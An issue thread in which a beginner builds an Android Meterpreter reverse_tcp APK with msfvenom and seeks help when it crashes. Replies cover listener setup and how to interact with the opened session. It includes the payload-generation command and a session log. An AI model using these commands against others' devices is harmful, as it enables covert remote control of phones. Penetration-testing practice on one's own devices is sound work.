meterpreter app continually crashes on android

Question

meterpreter app continually crashes on android

HsPanda opened this issue 7 years ago · 12 comments

hello, i'm new to this and testing things out/following tutorials

i'm using a usb live version of kali and i'm trying to create an apk for my phone

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > app.apk

i think just manually transfer the created apk file to my phone and install it, it installs fine but then when i try to launch it i keep getting the error that "unfortunately mainactivity has stopped"
not sure how to correct this, any help?

Answer 1 · 2017-10-10T00:58:51.000Z

What version of metasploit
what phone and OS
what guide are you following
did you start the multi handler to accept the connection from the meterpreter app?

Answer 2 · 2017-10-10T01:58:24.000Z

4.16.6 - dev
android samsung galaxy s4 using SW: 5.0.1
several guides including : https://www.security-sleuth.com/sleuth-blog/2015/1/11/using-metasploit-to-hack-an-android-phone and http://resources.infosecinstitute.com/lab-hacking-an-android-device-with-msfvenom/#gref and also checking the forum a little bit for guidance (like using msfvenom instead of msfpayload)
as far as i can tell, yes, i'm using a combination of the basic msf terminal and armitage, the phone i'm trying to hack shows up in armitage but it's greyed out, then it will connect for a minute and go back to greyed out (which corisponds with the app opening then crashing )

Answer 3 · 2017-10-10T02:01:35.000Z

your lhost is 127.0.0.1? are you running msf on the phone itself?
Can you show the step by step of the venom creation, and the multi handler starting? Good to show EXACTLY what you are running so we don't speculate.

I'd also be worried that the one blog is 2.5yrs old, LOTS changes in that time.

Answer 4 · 2017-10-10T02:07:54.000Z

launch terminal

type in msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 lport=4444 R > app.apk

copy/paste apk file to my phone (plugged in via usb)
install apk
launch apk (apk will crash at this point)

launch armitage keeping everything default
(host 127.0.0.01, port 55553 )
select yes to start metasploit
in armitage select Armitage - listeners - Lhost , set lhost to 192.168.0.4, then select listeners -reverse, put port 4444 and select type as "meterpreter"

Answer 5 · 2017-10-10T02:09:25.000Z

not knowing armitage, not sure if "meterpreter" will handle an android one or not.
Try running the multi handler in a console instead to ensure its the right meterpreter

Answer 6 · 2017-10-10T02:11:00.000Z

yeah but wouldn't the app continually crashing prevent the meterpreter from running on the phone to start with? so if i use armitage or if i use the console it wouldn't matter because there is nothing to listen for?

it's more the app crashing i'm trying to fix =/

Answer 7 · 2017-10-10T10:51:57.000Z

update: i got the apk stable on the phone and it appears to be working, for the most part, except all i get when i exploit is .....

exploit
[*] Exploit running as background job 0.

[] Started reverse TCP handler on 192.168.0.4:443
msf exploit(handler) > [] Sending stage (69048 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.4:443 -> 192.168.0.6:60621) at 2017-10-10 10:43:52 +0000

and then nothing, the meterpreter command line never shows up

Answer 8 · 2017-10-10T11:01:27.000Z

@HsPanda you can switch to the session with sessions 1

msf > sessions 1
meterpreter >

Join our irc, it's much easier to help you there than via github

Answer 9 · 2017-10-10T11:08:46.000Z

@timwr AWESOME! THANK YOU!

Answer 10 · 2019-01-28T21:04:06.000Z

How did you managed to make the app stable and not to crash ?

Answer 11 · 2019-04-04T22:56:05.000Z

how did you get you app not to crash (MAIN ACTIVITY )

Answer 12 · 2020-05-13T13:49:15.000Z

how did you solve it